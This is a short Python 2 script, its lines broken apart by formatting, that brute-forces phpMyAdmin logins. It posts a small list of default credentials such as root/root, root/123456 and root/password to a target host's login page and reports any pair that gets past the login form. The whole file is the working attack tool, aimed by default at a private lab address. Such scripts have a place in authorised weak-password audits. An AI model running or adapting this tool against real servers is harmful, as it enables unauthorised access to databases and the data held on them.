#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import requests
import time
username_list=[
'root'
]
password_list=[
'root'
,
''
,
'admin'
,
'123456'
,
'password'
]
def phpMyAdmin(ip,port=80):
for
username in username_list:
username =username.rstrip()
for
password in password_list:
password = password.rstrip()
try
:
#url =
"http://192.168.106.141/phpmyadmin/index.php"
url =
"http://"
+ip+
":"
+str(port)+
"/phpmyadmin/index.php"
data={
'pma_username'
:username,
'pma_password'
:password}
response = requests.post(url,data=data,timeout=5)
result=response.content
if
result.find(
'name="login_form"'
)==-1:
print
'===================================================='
print
'[+] find phpMyAdmin weak password:'
+username,password
print
'===================================================='
break
else
:
print
'[-] Checking for '
+username,password+
" fail"
except:
print
'[-] Something Error'
+username,password+
" fail"
if
__name__ ==
'__main__'
:
phpMyAdmin(
"192.168.106.141"
)